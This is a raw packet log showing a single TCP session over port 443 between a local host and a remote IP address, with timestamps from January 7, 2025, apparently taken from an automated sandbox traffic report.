Jan 7, 2025 04:22:07.560199976 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.564342022 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.564399958 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.564492941 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.564568043 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.569809914 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.569878101 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.569894075 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.569940090 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.575333118 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.575362921 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.575388908 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.575397968 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.575408936 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.575436115 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.580660105 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.580688953 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.580715895 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.580724955 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.580737114 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.580760956 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.584310055 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.584337950 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.584367990 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.584374905 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.584399939 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.584427118 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.587584019 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.587635994 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.587651968 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.587699890 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.590997934 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.591052055 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.591110945 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.591154099 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.594057083 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.594110966 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.597146988 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.597214937 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.597284079 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.597331047 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.623094082 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.623122931 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.623151064 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.623161077 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.623176098 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.623195887 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.625425100 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.625477076 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.625603914 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.625649929 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.631001949 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.631098032 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.631150961 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.631198883 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.636857033 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.636904955 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.637046099 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.637088060 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.641906977 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.641951084 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.642038107 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.642079115 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.647685051 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.647721052 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.647737026 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.647744894 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.647810936 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.647810936 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.652429104 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.652497053 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.652549982 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.652596951 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.656832933 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.656872988 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.656893969 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.656900883 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.656920910 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.656935930 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.662206888 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.662251949 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.662323952 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.662372112 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.667638063 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.667690039 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.667865038 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.668034077 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.673034906 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.673085928 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.673180103 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.673224926 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.676587105 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.676645041 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.676697969 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.676743031 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.679940939 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.680037022 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.680037975 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.680047989 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.680083990 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.683584929 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.683613062 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.683674097 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.683674097 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.683681965 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.683717966 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.686527967 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.686568975 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.686609983 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.686651945 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.689611912 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.689659119 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.689728022 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.689765930 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.707556009 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.715487957 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.715533972 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.715645075 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.715689898 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.717911959 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.717969894 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.718066931 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.721218109 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.723479033 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.723572016 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.723696947 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.723746061 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.729446888 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.729476929 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.729491949 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.729501009 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.729526997 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.729538918 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.734375954 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.734431982 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.734586954 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.734639883 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.740271091 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.740304947 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.740346909 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.740358114 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.740386963 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.740401030 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.744992018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.745141983 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.745234966 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.745297909 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.749456882 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.749488115 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.749552965 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.749563932 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.749588966 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.749661922 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.754744053 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.754843950 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.754894018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.754955053 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.760276079 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.760304928 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.760337114 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.760345936 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.760361910 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.760401011 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.765455008 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.765546083 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.765604019 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.765659094 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.769077063 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.769129038 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.769265890 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.769344091 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.772619963 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.772655010 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.772716999 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.772716999 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.772728920 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.772808075 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.776019096 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.776120901 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.776125908 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.776134968 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.776175022 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.776175022 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.779005051 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.779072046 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.779150009 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.779211998 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.782136917 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.782186031 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.782195091 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.782253981 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.810307026 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.810369968 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.810439110 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.810496092 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.815470934 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.815536976 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.815565109 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.815649033 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.824851990 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.826750994 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.826812029 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.826939106 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.827007055 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.834455967 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.834532976 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.834551096 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.834602118 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.835553885 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.835613966 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.835705042 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.835776091 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.836770058 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.836843014 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.836890936 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.836951017 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.838192940 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.838264942 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.838321924 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.838382959 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.841813087 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.841892958 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.841954947 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.842037916 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.847222090 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.847306013 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.847373009 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.847424030 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.853214979 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.853292942 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.853363037 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.853477955 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.862049103 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.862144947 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.862185955 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.862241030 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.871308088 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.871359110 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.871397972 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.871473074 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.873191118 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.873264074 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.873388052 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.873466015 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.873816013 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.873864889 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.873874903 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.873883009 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.873927116 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.873927116 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.874309063 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.874355078 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.874511957 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.874562979 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.874625921 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.874696016 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.874711037 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.874756098 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.902834892 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.902923107 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.902955055 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.903060913 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.908010960 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.908071041 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.908149004 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.908198118 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.919269085 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.919341087 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.919403076 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.919493914 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.927004099 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.927073956 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.927078009 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.927088022 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.927143097 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.927143097 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.928078890 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.928133965 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.928277969 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.928329945 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.929332018 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.929374933 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.929389000 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.929403067 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.929418087 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.929440975 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.930730104 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.930792093 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.930897951 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.930947065 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.934319973 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.934369087 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.934390068 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.934398890 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.934415102 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.934437037 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.939903975 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.939943075 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.939975977 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.939984083 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.940012932 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.940013885 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.945885897 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.945985079 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.946084976 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.946094990 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.948781967 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.963057995 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.963165045 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.963218927 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.963319063 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.963934898 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.963994026 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.964044094 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.964121103 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.965825081 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.965858936 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.965882063 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.965893984 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.965904951 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.965955973 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.966355085 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.966413975 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.966510057 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.966568947 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.966850996 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.966911077 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.967020988 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.967068911 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.967171907 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.967210054 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.967277050 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.967277050 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.967284918 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.967350006 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.995420933 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.995450974 CET	443	49740	39.103.20.48	192.168.2.4
Jan 7, 2025 04:22:07.995508909 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.995508909 CET	49740	443	192.168.2.4	39.103.20.48
Jan 7, 2025 04:22:07.995521069 CET	443	49740	39.103.20.48	192.168.2.4
